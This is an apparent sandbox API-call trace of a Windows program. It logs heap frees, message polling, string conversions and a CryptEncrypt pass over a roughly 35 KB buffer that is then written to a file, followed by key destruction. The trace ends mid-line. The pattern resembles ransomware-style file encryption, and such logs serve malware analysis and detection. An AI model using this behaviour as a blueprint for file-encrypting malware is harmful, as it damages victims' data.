1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ac0098 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0210.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0210.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab3f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.536] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x8c04, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8c08) returned 1 [0210.536] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.536] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.536] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.536] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.536] CharLowerBuffW (in: lpsz="byte[35848]", cchLength=0xb | out: lpsz="byte[35848]") returned 0xb [0210.536] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.537] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.537] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.537] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.537] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.537] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.537] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.537] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ac0098*, pdwDataLen=0x8cef60*=0x8c04, dwBufLen=0x8c08 | out: pbData=0x2ac0098*, pdwDataLen=0x8cef60*=0x8c08) returned 1 [0210.538] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.538] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.539] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.539] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.539] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.539] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.539] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.539] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.539] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.539] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.539] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.539] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.539] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.539] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.539] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.539] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.539] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.539] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.539] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.540] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.540] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.547] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.547] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.547] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.548] WriteFile (in: hFile=0x520, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x8c08, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x8c08, lpOverlapped=0x0) returned 1 [0210.549] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.549] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.549] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0210.549] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.549] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0210.549] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.549] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.549] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.550] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.550] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.550] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.550] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaf60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0210.550] CryptDestroyKey (hKey=0x9e1c38) returned 1 [0210.550] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.550] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.550] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.550] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.550] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.550] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.550] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.550] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.550] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.550] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.550] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.550] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.550] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.550] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.550] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.551] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.551] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.551] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.551] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.554] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.554] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.554] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.554] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.554] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.554] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.555] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.555] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.555] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.555] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.555] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.555] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.555] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.555] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.555] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.555] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.555] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.555] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.555] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.555] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.555] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.555] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.555] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.555] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.555] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.555] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.555] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.555] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.555] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.556] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.556] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.556] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.556] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.556] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0210.556] CryptReleaseContext (hProv=0xa7c6e8, dwFlags=0x0) returned 1 [0210.556] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.556] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.556] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.556] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.556] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.556] PeekMessageW (in: 